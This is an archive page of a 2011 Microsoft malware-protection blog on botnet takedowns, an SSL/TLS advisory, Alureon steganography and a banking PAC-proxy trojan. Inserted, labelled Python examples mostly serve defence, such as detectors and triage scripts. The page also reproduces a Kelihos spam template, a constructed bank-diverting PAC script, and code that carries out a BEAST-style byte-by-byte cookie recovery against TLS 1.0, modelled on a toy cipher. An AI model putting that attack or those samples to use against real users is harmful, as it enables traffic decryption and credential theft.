Archive

Archive for September, 2011

Rustock: civil case closed

September 30th, 2011 No comments

Microsoft has officially announced that our civil case against the operators of the Rustock botnet (a major source of spam) has been closed and our teams have turned over the information we’ve gathered to the FBI.

The Rustock botnet is considered one of the largest sources of spam on the Internet and our case is helping to reduce the effects of the botnet and ensure that it will never be used for cybercrime again.

Learn how to clean an infected computer and help protect your PC with botnet protection and avoid malware.

What is the Rustock botnet?

The Rustock botnet is a network of infected computers controlled by cybercriminals and used for spam, fraud, and other cybercrime. The owners of infected computers probably had no idea that their computer was being used to send spam.

What did the Rustock botnet do?

Most of the spam messages generated by the Rustock botnet promoted counterfeit or unapproved generic pharmaceuticals from unlicensed and unregulated online drug sellers.  Rustock spam also used Microsoft’s trademark to promote these drugs. In another scheme, Rustock-generated email lured people into lottery scams in which spammers attempted to convince people that they had won a lottery. The victims were told that they needed to send the spammers money to collect the larger lottery winnings. 

Help protect yourself against these kinds of email and web scams.

Microsoft is offering a $250,000 reward for information that leads to the arrest and conviction of Rustock’s operators. Any tips should be sent directly to the FBI at MS_Referrals@ic.fbi.gov.

More information about the Rustock botnet

Categories: botnet, Microsoft, Rustock, security, spam Tags:

Updated requirements for a Windows Server 2008 R2 domain controller certificate from a 3rd party CA

September 28th, 2011 No comments

Do you use parental controls?

September 27th, 2011 No comments

If you’re a parent, guardian, or a caregiver for kids, parental controls can help you control the content that your kids see on the Internet or on their Xbox. You can use parental controls to help support your own house rules and you can even customize them to fit a child’s age or maturity level.

The Family Online Safety Institute recently released the Parents’ Views of Online Safety study (sponsored by Microsoft) that found just over half of all U.S. parents say they’ve used family safety software to limit or monitor their child’s Internet use.

Compare family safety tools from Microsoft.

Read more.

What’s your experience with parental controls? Tell us about it in a comment below.

Operation b79 (Kelihos) and Additional MSRT September Release

September 27th, 2011 No comments

For the month of September, Microsoft is adding the Win32/Kelihos family to a second release of the Malicious Software Removal Tool. This additional release supports the most recent action in Project MARS, Operation b79, which targets the Kelihos botnet. Operation b79 builds on the successes of the Rustock and Waledac takedowns. It extends our previous legal tactics, alongside our technical measures, in that we are, for the first time, naming a defendant in a civil case involving a botnet. The intent is to send a strong message to online criminals that accountability still applies on the Internet, and that our goal is to make online crime riskier and more expensive for those involved. You can see more details on the legal aspects of this operation in the blog of our partners in the Microsoft Digital Crimes Unit.

The Win32/Kelihos malware family distributes spam email messages that may contain links to web sites serving installers of Kelihos itself. It may also communicate with remote computers to exchange information that it uses to execute various tasks such as bootstrapping to the botnet, sending spam emails promoting bogus products or services, stealing sensitive information, or downloading and executing arbitrary files.

Figure 1 below shows the monthly reported counts from our telemetry for the Win32/Kelihos family. It first spiked around the holidays last year with a holiday-themed spam campaign that distributed e-cards containing malicious links pointing to servers hosting Kelihos installers. As the chart shows, it has been growing slowly ever since.

Win32/Kelihos graph 

Figure 1 Win32/Kelihos Detection Reports

We have observed Win32/Kelihos protecting itself with several techniques: server-side polymorphism, encrypted communication (a sample of which is shown in Figure 2), fast-flux, and dynamic reconfiguration. It stays connected to the botnet using an updatable peer list, and it can update itself to run new or improved versions and to take on additional tasks. In our investigation of this botnet’s command and control infrastructure, and as we allege in our complaint, we identified more than 3,700 subdomains being hosted in the Czech Republic by a single hoster. This same hoster had more than 215,000 subdomains hosting malware. In May of 2011, Google temporarily blocked more than 200,000 of these but reinstated the subdomains after the defendant allegedly corrected the problem.

Win32/Kelihos encrypted communication

Figure 2 Encrypted Communication

To avoid detection by antivirus and other security products, the binaries distributed by Win32/Kelihos are also wrapped in obfuscators that use anti-emulation tricks. In addition, Kelihos randomizes the header values of its HTTP request messages to make them harder for network inspection (NIS/IPS) products to catch: aside from randomizing the names of the .htm files it requests, it uses a different User-Agent string for each subsequent message.
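Randomizing the User-Agent defeats a signature on any one value, but the randomization itself is visible in proxy logs: a real browser presents one User-Agent for a whole session, whereas a bot that rotates headers per request shows a User-Agent count close to its request count. The following Python is an added example (not Microsoft's or Kelihos code) that runs that check over a constructed proxy log; the log lines, IP addresses and thresholds are all made up for the example.

```python
import re
from collections import defaultdict

# Constructed proxy log (not from the original post): 10.0.0.5 changes its
# User-Agent and requests a fresh random-looking .htm name on every request;
# 10.0.0.9 behaves like an ordinary browser session.
SAMPLE_LOG = """\
2011-09-27T10:00:01 10.0.0.5 GET /d3f9a1.htm "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
2011-09-27T10:00:02 10.0.0.9 GET /index.html "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/6.0"
2011-09-27T10:00:03 10.0.0.5 GET /7bc22e.htm "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)"
2011-09-27T10:00:04 10.0.0.5 GET /a01f7d.htm "Opera/9.80 (Windows NT 5.1; U; en)"
2011-09-27T10:00:05 10.0.0.9 GET /style.css "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/6.0"
2011-09-27T10:00:06 10.0.0.5 GET /c4e8b0.htm "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
2011-09-27T10:00:07 10.0.0.9 GET /app.js "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/6.0"
"""

# Assumed log layout: timestamp, client IP, method, path, quoted User-Agent.
LINE = re.compile(r'^(?P<ts>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$')


def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LINE.match(line)
        if m:
            yield m.groupdict()


def flag_header_churn(lines, min_requests=4, min_ua_ratio=0.75):
    """Return {client_ip: (requests, distinct_user_agents, distinct_paths)} for
    clients that present a different User-Agent on nearly every request.
    The detection keys on the churn, not on any particular header value, so it
    survives the bot picking new strings."""
    uas, paths, count = defaultdict(set), defaultdict(set), defaultdict(int)
    for r in parse(lines):
        count[r["ip"]] += 1
        uas[r["ip"]].add(r["ua"])
        paths[r["ip"]].add(r["path"])
    return {
        ip: (n, len(uas[ip]), len(paths[ip]))
        for ip, n in count.items()
        if n >= min_requests and len(uas[ip]) / n >= min_ua_ratio
    }


if __name__ == "__main__":
    for ip, (n, ua_n, path_n) in flag_header_churn(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {n} requests, {ua_n} user agents, {path_n} distinct paths")
```

The thresholds are a starting point, not a tuned signature: shared NAT addresses and some download managers also show several User-Agents per source, so treat a hit as a lead to pivot on (the randomized .htm names, the destination hosts) rather than a verdict.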

Over the past months, Kelihos has launched various spam campaigns promoting scams or dubious products. Because its email templates and address lists are reconfigurable, Kelihos can update its spam runs easily, and more than one spam campaign can run in the botnet at any given time. Figure 3 below shows an example of a spam email template being distributed in the Kelihos botnet at the time of writing:

Received: from unknown (HELO %^C6%^I^%.%^I^%.%^I^%.%^I^%^%) ([%^V6^%])
by %^A^% with ESMTP; %^D%^R20-300^%^%
Message-ID: <%^O%^V6^%:%^R3-50^%^%%^V0^%>
From: "%^Fmynames^% %^Fsurnames^%" <%^Fnames^%@%^Fdomains^%>
To: <%^0^%>
Subject: %^Fskli_subj^%
Date: %^D-%^R30-600^%^%
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="KOI8-R";
reply-type=original
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.%^C7%^Foutver.6^%^%
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.%^V7^%

Новости из Беларуси:
– политика и экономика
– общество и культура
– акции и забастовки
– фотохроника
и многое другое: %^Fskli_link^%

Figure 3 Spam Email Template (the body is KOI8-R Russian; in English it reads "News from Belarus: politics and economics; society and culture; rallies and strikes; photo chronicle; and much more:" followed by the link macro)

The above template was used to distribute spam containing links to a website of a political activist group in Eastern Europe.
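A captured template is also a ready-made detector: every literal byte of it (the header order, format=flowed, the KOI8-R charset, the Outlook Express X-Mailer line) is constant across the run, and only the macro slots vary. The following Python is an added example, not Kelihos code and not Microsoft's: it tokenizes the Figure 3 headers assuming only the visible syntax (a macro opens with %^, closes with ^% and may nest, as in %^C6%^I^%.%^I^%^%), counts the variable slots, and compiles the template into a regular expression that matches any rendered instance. It assumes nothing about what a given macro expands to. The rendered message it matches against is constructed for the example.

```python
import re

OPEN, CLOSE = "%^", "^%"


def tokenize(template):
    """Split a Kelihos-style template into ('lit', text) / ('macro', body) tokens.
    Macros nest, so the closing ^% is found by depth counting, not by regex.
    Macro semantics are not documented on the page and are not assumed here."""
    tokens, literal, i = [], [], 0
    while i < len(template):
        if not template.startswith(OPEN, i):
            literal.append(template[i])
            i += 1
            continue
        if literal:
            tokens.append(("lit", "".join(literal)))
            literal = []
        depth, j = 1, i + len(OPEN)
        while j < len(template) and depth:
            if template.startswith(OPEN, j):
                depth, j = depth + 1, j + len(OPEN)
            elif template.startswith(CLOSE, j):
                depth, j = depth - 1, j + len(CLOSE)
            else:
                j += 1
        if depth:
            raise ValueError("unterminated macro at offset %d" % i)
        tokens.append(("macro", template[i + len(OPEN):j - len(CLOSE)]))
        i = j
    if literal:
        tokens.append(("lit", "".join(literal)))
    return tokens


def macro_slots(template):
    """Top-level macro bodies, i.e. the fields that change per message."""
    return [body for kind, body in tokenize(template) if kind == "macro"]


def template_to_regex(template):
    """Literals are matched exactly; each macro becomes a single-line wildcard."""
    parts = [re.escape(text) if kind == "lit" else r"[^\r\n]+?"
             for kind, text in tokenize(template)]
    return re.compile(r"\A" + "".join(parts) + r"\Z")


def matches_template(template, message):
    return template_to_regex(template).match(message) is not None


# Header block of the Figure 3 template (To: on its own line).
KELIHOS_TEMPLATE = "\n".join([
    'Received: from unknown (HELO %^C6%^I^%.%^I^%.%^I^%.%^I^%^%) ([%^V6^%])',
    'by %^A^% with ESMTP; %^D%^R20-300^%^%',
    'Message-ID: <%^O%^V6^%:%^R3-50^%^%%^V0^%>',
    'From: "%^Fmynames^% %^Fsurnames^%" <%^Fnames^%@%^Fdomains^%>',
    'To: <%^0^%>',
    'Subject: %^Fskli_subj^%',
    'Date: %^D-%^R30-600^%^%',
    'MIME-Version: 1.0', 'Content-Type: text/plain;', 'format=flowed;',
    'charset="KOI8-R";', 'reply-type=original', 'Content-Transfer-Encoding: 8bit',
    'X-Priority: 3', 'X-MSMail-Priority: Normal',
    'X-Mailer: Microsoft Outlook Express 6.00.%^C7%^Foutver.6^%^%',
    'X-MimeOLE: Produced By Microsoft MimeOLE V6.00.%^V7^%',
])

# Constructed rendering of that template (addresses and names are made up).
RENDERED_SAMPLE = "\n".join([
    'Received: from unknown (HELO 203.0.113.45) ([198.51.100.7])',
    'by mx.example.test with ESMTP; Tue, 27 Sep 2011 09:41:17 +0000',
    'Message-ID: <000301cc7cf9$7a1c0e40$2d0071cb@home>',
    'From: "Ivan Petrov" <ivan.petrov@example.test>',
    'To: <victim@example.test>',
    'Subject: Novosti',
    'Date: Tue, 27 Sep 2011 09:36:02 +0000',
    'MIME-Version: 1.0', 'Content-Type: text/plain;', 'format=flowed;',
    'charset="KOI8-R";', 'reply-type=original', 'Content-Transfer-Encoding: 8bit',
    'X-Priority: 3', 'X-MSMail-Priority: Normal',
    'X-Mailer: Microsoft Outlook Express 6.00.2900.5512',
    'X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512',
])

# Same layout from a genuine Outlook Express install: one literal differs.
LEGIT_SAMPLE = RENDERED_SAMPLE.replace('charset="KOI8-R";', 'charset="iso-8859-1";')

if __name__ == "__main__":
    print(len(macro_slots(KELIHOS_TEMPLATE)), "variable slots")
    print("bot mail matches:", matches_template(KELIHOS_TEMPLATE, RENDERED_SAMPLE))
    print("legit mail matches:", matches_template(KELIHOS_TEMPLATE, LEGIT_SAMPLE))
```

The regex is deliberately strict on every literal, which is what makes it survive the per-message randomization; when the botnet pushes a new template the literals change and the signature must be regenerated, so keep the template, not the regex, as the source of truth.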

Another Kelihos payload steals sensitive information from the compromised computer, including email addresses, FTP login credentials, and Bitcoin wallets, among other things. Our investigation also revealed that in addition to hosting Kelihos, the defendants’ cz.cc domain has previously been investigated for delivering MacDefender, a rogue security software family that targets Mac OS X.

It is interesting to note that the Kelihos botnet shares significant code similarities with the Win32/Waledac botnet (Waledac was the target of our first Project MARS action, Operation b49). These similarities have led some to refer to Kelihos as “Waledac 2.0”. While similar to Waledac, the Kelihos botnet is more complicated in many ways. In spite of this complexity, we are hopeful that we will disrupt a meaningful portion of the botnet in addition to naming a defendant. Both are important steps towards deterring online crime globally.

If you believe a computer under your care may be infected with Kelihos or other malicious software, we recommend that you use antivirus software from a provider you trust. You can find information about Project MARS as well as additional support information at http://support.microsoft.com/botnets.

Categories: MSRT, Win32/Kelihos Tags:

Microsoft releases Security Advisory 2588513

September 26th, 2011 No comments

Hello. Today we released Security Advisory 2588513, addressing an information-disclosure issue in SSL (Secure Sockets Layer) 3.0 and TLS (Transport Layer Security) 1.0, to provide guidance for customers. This is an industry-wide issue with limited impact that affects the Internet ecosystem as a whole rather than any specific platform. Our advisory addresses the issue as it applies to the Windows operating system.

We are not aware of a way to exploit this issue in other protocols or components, and we have no reports of exploitation in the wild at this time; our investigation continues, but our research so far indicates that customers are at minimal risk. To successfully exploit this issue, the would-be attacker must meet several conditions:

  • The targeted user must be in an active HTTPS session;
  • The malicious code the attacker needs to decrypt the HTTPS traffic must be injected and run in the user’s browser session; and,
  • The attacker’s malicious code must be treated as coming from the same origin as the HTTPS server in order for it to be allowed to piggyback on the existing HTTPS connection.

In addition, because of the way this man-in-the-middle attack operates, a would-be attacker needs a fairly high-bandwidth connection to the target. Later versions of TLS (1.1 and 1.2) are not susceptible to this approach; our Security Advisory gives guidance on how to enable TLS 1.1 and 1.2 for customers who believe themselves to be at significant risk from this issue. Note that a connection only uses TLS 1.1 or 1.2 if the server side supports it as well.
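Why those conditions matter, and why TLS 1.1 closes the hole, can be seen in the record layer itself. The following Python is an added example, not part of the advisory or of any Microsoft code. It models TLS 1.0's CBC chaining (each record's IV is the last ciphertext block of the previous record, so the next IV is visible on the wire) with a toy Feistel cipher standing in for AES, lets an attacker who can inject chosen plaintext into the victim's session and watch the ciphertext recover a constructed secret one byte at a time, and then shows the same attacker getting nothing once every record gets a fresh random IV, which is what TLS 1.1 and 1.2 do. The key, the IV, the secret and the cipher are all constructed for the example.

```python
import hashlib
import hmac
import os

BLOCK = 16


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    """Toy 128-bit block cipher: a 4-round Feistel network with HMAC-SHA256 as
    the round function. It stands in for AES so the example needs only the
    standard library; the attack does not depend on which cipher sits in CBC."""
    assert len(block) == BLOCK
    left, right = block[:8], block[8:]
    for rnd in range(4):
        f = hmac.new(key, bytes([rnd]) + right, hashlib.sha256).digest()[:8]
        left, right = right, _xor(left, f)
    return left + right


class Tls10Records:
    """TLS 1.0 record layer as the advisory describes it: CBC mode where the IV
    of each record is the last ciphertext block of the previous record, so the
    IV the next record will use is visible to anyone watching the wire."""

    def __init__(self, key, iv):
        self.key, self.chain = key, iv

    def next_iv(self):
        return self.chain            # what an eavesdropper predicts the next IV to be

    def send(self, plaintext):
        assert len(plaintext) % BLOCK == 0       # TLS padding omitted for brevity
        out = b""
        for i in range(0, len(plaintext), BLOCK):
            self.chain = block_encrypt(self.key, _xor(plaintext[i:i + BLOCK], self.chain))
            out += self.chain
        return out


class Tls11Records(Tls10Records):
    """TLS 1.1/1.2 behaviour: a fresh random explicit IV for every record.
    The previous ciphertext is still visible but no longer predicts the IV."""

    def send(self, plaintext):
        self.chain = os.urandom(BLOCK)
        return Tls10Records.send(self, plaintext)


def recover_secret(records, secret, nbytes):
    """Attacker model from the advisory: code running in the HTTPS origin lets
    the attacker choose a plaintext prefix placed in front of a secret (say, a
    cookie) in the same session, and the attacker sees every ciphertext block.
    Returns the bytes recovered; stops at the first byte that cannot be confirmed."""
    recovered = b""
    for k in range(nbytes):
        prefix = b"A" * (BLOCK - 1 - k)          # aligns secret[k] as the last byte of block 0
        iv_used = records.next_iv()              # IV that block 0 is about to be chained with
        msg = prefix + secret
        msg += b"\x00" * (-len(msg) % BLOCK)      # filler so the record is block aligned
        target = records.send(msg)[:BLOCK]       # C0 = E((prefix | secret[:k+1]) XOR iv_used)
        known = prefix + recovered               # 15 of the 16 bytes behind C0 are now known
        for g in range(256):
            guess = known + bytes([g])
            # Pick the injected block so that CBC chaining with the predicted IV
            # turns it into exactly (guess XOR iv_used) at the cipher input.
            inject = _xor(_xor(guess, iv_used), records.next_iv())
            if records.send(inject)[:BLOCK] == target:
                recovered += bytes([g])          # guess == secret[:k+1], byte confirmed
                break
        else:
            break                                # no match: the IV was not predictable
    return recovered


SECRET = b"session=7c3a9e1f"    # constructed 16-byte secret the attacker must not know


def demo(record_layer):
    key, iv = os.urandom(BLOCK), os.urandom(BLOCK)
    return recover_secret(record_layer(key, iv), SECRET, 6)


if __name__ == "__main__":
    print("TLS 1.0 chained IV:", demo(Tls10Records))   # b'sessio'
    print("TLS 1.1 random IV :", demo(Tls11Records))   # b''
```

Each recovered byte costs up to 256 injected records on a session that has to stay open, which is the bandwidth requirement mentioned above; in a browser the injection is done by same-origin code issuing requests, and the secret is a cookie the browser appends to them. The fix in TLS 1.1 is exactly the `Tls11Records` change: the attacker still sees the last ciphertext block but can no longer choose a plaintext that cancels it.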

For further information on the nature of the issue, please see “Is SSL broken? – More about Security Advisory 2588513” on the SRD blog.

If you haven’t done so already, we suggest that you register for our security alerts (via email or RSS) on the Microsoft Technical Security Notifications page.

Thanks —
Jerry Bryant
Group Manager, Response Communications
Trustworthy Computing Group

Categories: advisory, Security Advisory Tags:

Microsoft Security Advisory (2588513): Vulnerability in SSL/TLS Could Allow Information Disclosure – Version: 1.0

Revision Note: V1.0 (September 26, 2011): Advisory published.
Summary: Microsoft is aware of detailed information that has been published describing a new method to exploit a vulnerability in SSL 3.0 and TLS 1.0, affecting the Windows operating system. This vulnerability affects the protocol itself and is not specific to the Windows operating system. This is an information disclosure vulnerability that allows the decryption of encrypted SSL/TLS traffic. This vulnerability primarily impacts HTTPS traffic, since the browser is the primary attack vector, and all web traffic served via HTTPS or mixed content HTTP/HTTPS is affected. We are not aware of a way to exploit this vulnerability in other protocols or components and we are not aware of attacks that try to use the reported vulnerability at this time. Considering the attack scenario, this vulnerability is not considered high risk to customers.

Categories: Uncategorized Tags:

A tale of grannies, Chinese herbs, Tom Cruise, Alureon and steganography

September 26th, 2011 No comments

I’ve been monitoring the development of a particular strain of Alureon since the start of August this year. The installer (detected as Trojan:Win32/Alureon.FE – cc9a8000f80b6aecee30375e3277292a725acbfb) is easily distinguishable from more prevalent strains such as Trojan:Win32/Alureon.DX by the use of PE resources to store each component. This particular installer is often downloaded by variants of Trojan:Win32/Fakesysdef using remote file names such as ‘531-direct’.

Whilst investigating one of the components this week, I came across something new: Functionality to download another component with the file name ‘com32’ had been added. I proceeded to download and decrypt this component. My initial analysis yielded what appeared to be functionality related to cryptography and JPG processing. This intriguing combination piqued my interest, owing in part to a section of the configuration file which I had examined earlier.

I turned my attention to trying to determine the purpose of the URLs hosted on the free blogging sites “LiveJournal” and “WordPress”. The content of each page appeared to be benign, containing numerous and varied JPGs hosted on the free image provider “imageshack.us”. Examining the code responsible for retrieving the pages, I discovered the HTML content was parsed for specific IMG tags.

Alureon would then attempt to retrieve the JPG pointed to by the markup. The raw data, along with a 61-character ASCII string, would then be passed to the ‘com32’ component. The long string had a distinctly password-like appearance.

After further investigation, I was able to determine that each JPG had a complete configuration file embedded in it using steganography. One of the critical sections of the configuration file is the list of command and control servers. That revealed the purpose of the publicly hosted data: it provides a layer of redundancy, a fallback for when the existing command and control domains become unavailable. If no command and control server can be contacted, Alureon retrieves an updated configuration file from these ‘backup’ locations.

And below is a collage of the images I encountered, in which the configuration file is tucked away — a grandmotherly woman, a bowl of Chinese medicinal herbs, and a fellow who appears to be the star of Top Gun.

Whilst the use of data embedded and obfuscated within JPG files is not a new technique, it is interesting to see Alureon adopt this technique as part of a defensive mechanism.
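The post does not disclose how the configuration is embedded in the images or what the 61-character string does beyond acting as a key, so the first analyst-side checks are generic. The following Python is an added example, not Alureon's code and not Microsoft's: it pulls the IMG URLs on a given image host out of a saved blog page, the way the sample is described as doing, and then walks a JPEG's segment structure to find data appended after the End-Of-Image marker, which is the simplest place to tuck a payload into an image that still displays normally. Walking the segments matters because a naive search for the FF D9 marker can stop early inside an EXIF thumbnail. The HTML, the image host subdomains and the JPEG bytes are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ImgCollector(HTMLParser):
    """Collect <img src> URLs whose host is the given domain or a subdomain of it."""

    def __init__(self, host_suffix):
        super().__init__()
        self.host_suffix, self.urls = host_suffix, []

    def handle_starttag(self, tag, attrs):
        if tag != "img":                       # HTMLParser lower-cases tag names
            return
        src = dict(attrs).get("src") or ""
        host = urlparse(src).hostname or ""
        # Exact match or dot-separated suffix; a bare endswith() would also
        # accept "notimageshack.us".
        if host == self.host_suffix or host.endswith("." + self.host_suffix):
            self.urls.append(src)


def image_urls(html, host_suffix="imageshack.us"):
    p = ImgCollector(host_suffix)
    p.feed(html)
    return p.urls


SOI, EOI = b"\xff\xd8", b"\xff\xd9"


def jpeg_end(jpeg):
    """Offset just past the EOI marker, found by walking the segment structure."""
    if not jpeg.startswith(SOI):
        raise ValueError("not a JPEG")
    i = 2
    while i + 1 < len(jpeg):
        if jpeg[i] != 0xFF:
            raise ValueError("expected a marker at offset %d" % i)
        marker = jpeg[i + 1]
        if marker == 0xD9:                                   # EOI
            return i + 2
        if marker == 0xFF:                                   # fill byte before a marker
            i += 1
            continue
        if 0xD0 <= marker <= 0xD7 or marker == 0x01:         # RSTn / TEM: no length field
            i += 2
            continue
        i += 2 + int.from_bytes(jpeg[i + 2:i + 4], "big")    # skip the segment
        if marker == 0xDA:                                   # SOS: entropy-coded data follows
            while i + 1 < len(jpeg):
                nxt = jpeg[i + 1]
                # FF 00 is a stuffed data byte and FF D0..D7 are restart markers;
                # any other FF xx ends the scan data.
                if jpeg[i] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                i += 1
    raise ValueError("no EOI marker found")


def data_after_eoi(jpeg):
    """Bytes appended after the real EOI, or b'' if the file ends cleanly."""
    return jpeg[jpeg_end(jpeg):]


def naive_after_eoi(jpeg):
    """The shortcut that goes wrong: first FF D9 in the file."""
    return jpeg[jpeg.find(EOI) + 2:]


# Constructed page in the shape described: benign-looking blog post with images.
SAMPLE_HTML = """<html><body><p>Family photos</p>
<img src="http://img123.imageshack.us/img123/1/granny.jpg" alt="">
<img src="http://static.example.net/logo.png">
<IMG SRC="http://img456.imageshack.us/img456/7/herbs.jpg">
<img src="http://notimageshack.us/x.jpg">
</body></html>"""

# Constructed minimal JPEG: an APP1 (EXIF) segment carrying a thumbnail with its
# own SOI/EOI, an abbreviated SOS header, scan data with a stuffed FF 00 and an
# RST0 marker, then the real EOI.
APP1_BODY = b"Exif\x00\x00" + b"\xff\xd8\xff\xd9"
SAMPLE_JPEG = (
    SOI
    + b"\xff\xe1" + (2 + len(APP1_BODY)).to_bytes(2, "big") + APP1_BODY
    + b"\xff\xda" + (3).to_bytes(2, "big") + b"\x01"
    + b"\x12\xff\x00\x34\xff\xd0\x56"
    + EOI
)
PAYLOAD = b"constructed-config-blob"

if __name__ == "__main__":
    print(image_urls(SAMPLE_HTML))
    print("appended:", data_after_eoi(SAMPLE_JPEG + PAYLOAD))
    print("naive   :", naive_after_eoi(SAMPLE_JPEG + PAYLOAD))
```

A non-empty result is a lead, not a verdict: some cameras and editors append harmless trailers, and a payload can equally be hidden inside an APP segment or in the image coefficients, where this check finds nothing; the page's sample decrypts the configuration with a key, so whatever is found will need that key before it means anything.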
 

Scott Molenkamp
MMPC Melbourne

Categories: Uncategorized Tags:

Rustock Case Update

September 23rd, 2011 No comments

Today, Microsoft’s Digital Crimes Unit announced that we have concluded our civil case against the Rustock botnet operators and turned evidence found during that investigation over to the FBI as a criminal referral. While the FBI will be driving that investigation, we will continue to offer the $250,000 reward for information which leads to the arrest and conviction of Rustock’s operators. Any leads can be sent to ms_referrals@ic.fbi.gov.

We will continue to work with ISPs and CERTs to clean infected computers utilizing the telemetry we receive from having control of Rustock’s command and control domains. Since the takedown in March, and through this cooperation, the Rustock botnet has declined in volume by almost 75%. You can see more about the overall volume at peak in the special edition of our Security Intelligence Report on Rustock which we released in June.
 
If you believe you may have a computer under your control which is infected with Rustock, you can find support information here: http://support.microsoft.com/contactus/cu_sc_virsec_b107#tab0
 
It is our recommendation that any system infected with Rustock be cleaned with a full antivirus product as our telemetry shows that machines infected with Rustock are generally infected with other malicious software as well.
 
— MMPC, Jeff Williams

Categories: Uncategorized Tags:

Windows 8: Updated security features

September 22nd, 2011 No comments
Categories: security, Windows 8 Tags:

Recover your Hotmail account

September 22nd, 2011 No comments

We recently received this email:

“My Hotmail account was hacked and taken over by the classic ‘I’m in London and I’ve been mugged’ scam. It appears that the hacker has changed the basic verification information on the account and every attempt to reset the password throws me into an endless loop.

How do I get my account back?”

It sounds like the author of this email has already tried to reset the password on the account manually. If you’re locked out of your account, the first thing you should always do is attempt to reset your password. Here are a few ways you can do this:

  • On the Windows Live Hotmail website sign-in page, click Forgot your password?
  • Go to the reset your password link.

First, enter your Windows Live ID. Then enter the characters you see in the picture, to prove that you’re not a machine.

Next, you’ll see a screen that offers you options to recover your password using an alternate email address or a mobile phone. If you haven’t associated your account with these alternatives, choose customer support.

Banker – the other way around

September 20th, 2011 No comments

Malware in the banker family uses many techniques to steal users’ authentication credentials for online banking sites. We came across an interesting sample recently, detected as Trojan:Win32/Banload.A, which uses a remote proxy script to target online banking sites and facilitate data theft.

When Trojan:Win32/Banload.A is executed, it opens an Internet browser to a certain animation site to trick the user into thinking that it’s nothing but an animation file:

 

 

However, the cute animation masks the trojan’s main objective, which is to modify the web browser settings to use a Proxy Auto-Configuration (PAC) script. And once that is set, that’s it! Mission accomplished! This malware’s job is done, for now…

 

 

By using a proxy configuration script, the trojan sets the user’s Internet connection to be routed through a proxy server.
 
Affected users should note that because Trojan:Win32/Banload.A changes the proxy settings, removing the malware alone will not return an affected computer to its pre-compromise state: the configuration settings must be fixed manually. Until they are, and as long as the remote script remains available, the affected computer keeps using it. The script effectively mediates the affected user’s Internet use, possibly providing false information and redirecting the user away from sites of their choice to sites of the attacker’s choice, with the affected user none the wiser.
 
MMPC downloaded the Proxy Script from the URL (shown in the above graphic) and found it to be malicious; we detect it as TrojanProxy:JS/Banker.B. It contains code that monitors for online banking sites visited by the affected user, and redirects traffic to a proxy server that could result in the theft of authentication credentials or other sensitive information.
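Before clearing the setting, it is worth knowing which sites the script diverts, because that is the list of accounts the victim should assume are exposed. The following Python is an added example, not Microsoft's code and not the detected TrojanProxy:JS/Banker.B script: it runs a static pass over a constructed PAC in the shape the post describes (a few banking hosts sent to a proxy, everything else DIRECT so nothing looks wrong) and lists which host patterns go where. It handles the plain if/return PAC style only; an obfuscated script needs a JavaScript engine. The proxy address and bank hostnames are placeholders.

```python
import re

# Constructed PAC script (not the real one): selective diversion of banking
# hosts through the attacker's proxy, DIRECT for everything else.
SAMPLE_PAC = """
function FindProxyForURL(url, host) {
    if (shExpMatch(host, "*.bank-a.example") ||
        dnsDomainIs(host, "online.bank-b.example") ||
        host == "secure.bank-c.example") {
        return "PROXY 203.0.113.10:8080";
    }
    if (shExpMatch(host, "*.example.internal")) {
        return "DIRECT";
    }
    return "DIRECT";
}
"""

# if (<condition>) { return "<target>" ...  : condition ends at the ')' followed by '{'
COND_RETURN = re.compile(r'if\s*\((?P<cond>.*?)\)\s*\{\s*return\s*"(?P<target>[^"]*)"', re.S)
ANY_RETURN = re.compile(r'return\s*"([^"]*)"')
QUOTED = re.compile(r'"([^"]*)"')


def triage_pac(source):
    """Static first pass over a PAC script: which host patterns does it route,
    to where, and what does everything else get? Returns a dict with the
    pattern->target map, the fall-through target and the set of non-DIRECT
    targets (anything there is where the victim's traffic is being sent)."""
    diverted = {}
    for m in COND_RETURN.finditer(source):
        for pattern in QUOTED.findall(m.group("cond")):
            diverted[pattern] = m.group("target")
    returns = ANY_RETURN.findall(source)
    proxies = sorted({t for t in diverted.values() if t.upper() != "DIRECT"})
    return {
        "diverted": diverted,
        "default": returns[-1] if returns else None,
        "proxies": proxies,
    }


if __name__ == "__main__":
    report = triage_pac(SAMPLE_PAC)
    for pattern, target in report["diverted"].items():
        print(f"{pattern:28} -> {target}")
    print("everything else ->", report["default"])
    print("proxies to investigate:", report["proxies"])
```

Every pattern that resolves to something other than DIRECT names a site whose credentials should be treated as compromised. On the affected machine the script URL is stored in the AutoConfigURL value under HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings, which is what the Internet Options steps below clear; check it again after the malware has been removed, since a still-running component can simply write it back.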
 

In order to change these proxy settings:
 
1. In Internet Explorer, click the Tools menu, and then click Internet Options.
 
2. Click the Connections tab, and then click LAN Settings.
 
3. In the Automatic configuration area, de-select Use automatic configuration script.
 
4. Click OK.
 

For more information about using automatic proxy configuration, see the following articles:

 

SHA1s:
C3D1E6E68CC5241F92F22C07F120487C0AFB03D4
c93c7823c5ba4fe39a91964c8db08f413262719e
0525cbdce83410586a7707c10aea49e87c3f8a19

 

Jonathan San Jose
MMPC Melbourne

Categories: Uncategorized Tags:

Cumulative non-security update protects from fraudulent certificates

September 19th, 2011 No comments

Today, Microsoft re-released the KB2616676 non-security update for customers using Microsoft Windows XP and Windows Server 2003, which addresses an issue described in the “known issues” section of KB2616676. Customers who have enabled automatic updates are already protected and need take no further action; other customers should download the cumulative version of KB2616676 to protect themselves from the fraudulent certificates listed in Security Advisory 2607712.

 

Thanks,
